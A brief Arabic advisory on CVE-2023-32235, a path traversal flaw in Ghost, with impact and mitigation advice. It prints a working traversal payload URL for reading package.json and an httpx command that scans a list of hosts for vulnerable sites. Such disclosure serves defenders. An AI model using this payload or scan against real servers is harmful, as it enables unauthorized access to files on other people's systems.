
هجوم Directory Traversal (المعروف أيضًا باسم path traversal) يهدف إلى الوصول إلى الملفات والدلائل المخزنة خارج المجلد المقصود.
تطبيق Ghost عرضة لثغرة اجتياز المسار، والمعروفة باسم CVE-2023-32235. تسمح هذه الثغرة للمهاجم بالوصول إلى الملفات الحساسة خارج الدليل المخصص عن طريق التلاعب بمسار ملف "package.json".
يُظهر إثبات المفهوم التالي ثغرة اجتياز المسار: {{base-uri}}/assets/built%2F..%2F..%2F/package.json
httpx:
httpx -l subs.txt -path "/assets/built%2F..%2F..%2F/package.json" -status-code -mc 200يمكن أن يؤدي استغلال هذه الثغرة بنجاح إلى وصول غير مصرح به إلى الملفات الحساسة على الخادم المستهدف. قد يؤدي ذلك إلى كشف معلومات سرية، وانتهاك خصوصية المستخدم، وتقويض أمان التطبيق المتأثر.
للتخفيف من هذه الثغرة، يُوصى بتنفيذ التحقق الصارم من المدخلات وتعقيم البيانات المقدمة من المستخدم عند التعامل مع مسارات الملفات. يجب على المطورين تجنب قبول مدخلات المستخدم مباشرة لمسارات الملفات واستخدام بدائل آمنة مثل القوائم البيضاء للمسارات المقبولة أو استخدام مكتبات تركز على الأمان.